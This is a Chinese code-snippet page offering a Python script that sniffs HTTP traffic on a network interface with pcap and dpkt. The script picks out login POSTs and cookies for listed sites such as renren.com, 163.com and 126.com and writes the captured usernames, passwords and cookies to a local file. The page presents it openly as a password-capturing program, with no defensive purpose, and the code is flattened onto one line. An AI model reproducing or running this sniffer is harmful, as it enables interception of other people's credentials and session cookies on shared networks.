Python 捕获web密码的程序,python捕获web密码,能够抓取POST的用户名
Python 捕获web密码的程序,python捕获web密码,能够抓取POST的用户名
能够抓取POST的用户名、密码,以及一些GET的cookie
# -*- coding: utf8 -*-#!/usr/bin/env pythonimport pcapimport dpktdev='eth0'filter='tcp dst port 80'pc=pcap.pcap(dev) #注,参数可为网卡名,如eth0pc.setfilter(filter) #设置监听过滤器hostlist=['xiaonei.com', 'renren.com', '163.com', '126.com', 'cublog.cn', 'itlong.com']file=open('passwd.txt','w')for ptime,pdata in pc: #ptime为收到时间,pdata为收到数据 ether=dpkt.ethernet.Ethernet(pdata) ip=ether.data tcp=ip.data content_len=len(tcp)-8 host='' username='' password='' cookie='' geturl='' posturl='' username_pattern='' password_pattern='' #Only Process POST Packet# if tcp.data.find('POST')==-1 or tcp.data.find('GET')==-1:# continue #Get Host host_start=tcp.data.find('Host: ') if host_start != -1: host_end=tcp.data.find('\\r\\n', host_start) if host_end != -1: host=tcp.data[host_start:host_end] #print host else: continue else: continue #Check host in hostlist for _host in hostlist: if host.find(_host)==-1: continue else: print _host #Get GET URL geturl_start=tcp.data.find('GET ') if geturl_start!=-1: geturl_end=tcp.data.find('\\r\\n', geturl_start) if geturl_end!=-1: geturl=tcp.data[geturl_start:geturl_end] #print geturl #Pass picture if geturl.find('gif')!=-1 or geturl.find('png')!=-1 or geturl.find('jpg')!=-1: continue; #Get POST URL posturl_start=tcp.data.find('POST ') if posturl_start!=-1: posturl_end=tcp.data.find('\\r\\n', posturl_start) if posturl_end!=-1: posturl=tcp.data[posturl_start:posturl_end] #print posturl #Get Cookie cookie_start=tcp.data.find('Cookie: ') if cookie_start!=-1: cookie_end=tcp.data.find('\\r\\n', cookie_start) if cookie_end != -1: cookie=tcp.data[cookie_start:cookie_end] #print cookie #Compute username_pattern if host.find('xiaonei.com')!=-1 or host.find('renren.com')!=-1: username_pattern='email=' elif host.find('lilacbbs.com')!=-1: username_pattern='userid=' elif host.find('sso.itlong.com')!=-1: username_pattern='login_name=' else: username_pattern='username=' #Find UserName username_start=tcp.data.find(username_pattern) if username_start!=-1: username_end=tcp.data.find('&', username_start) if username_end!=-1: username=tcp.data[username_start:username_end] #print username else: continue #Find Password password_start=tcp.data.find('password=') if password_start!=-1: password_end=tcp.data.find('&', password_start) if password_end!=-1: password=tcp.data[password_start:password_end] #print password else: continue #Log to file if host and posturl and username and password: file.write('-----------------------\\n') file.write(host+'\\n') file.write(posturl+'\\n') file.write(username+'\\n') file.write(password+'\\n') file.flush() elif host and geturl and cookie: file.write('-----------------------\\n') file.write(host+'\\n') file.write(geturl+'\\n') file.write(cookie+'\\n') file.flush()#该片段来自于http://byrx.net
相关内容
- python回溯法实现数组全排列输出,python回溯,from sys im
- python 通过logging写入日志到文件和控制台,pythonlogging
- 基于LRU的缓存神器,LRU缓存神器,稍微修改,如“移除队
- python编写简单抽奖系统,python编写抽奖,#!/usr/bin/e
- 从songtaste.com上下载歌曲..,songtaste.com,import sys,u
- python输出当前目录下的index.html文件路径,python当前目录
- python 简易计算器,python计算器,#-*- coding:
- python分析网页上的所有超级链接,python分析超级链接
- python中使用MD5加密字符串,pythonmd5,#--encoding=
- 在虾米音乐查找豆瓣音乐豆列中的专辑,虾米豆瓣,在虾
评论关闭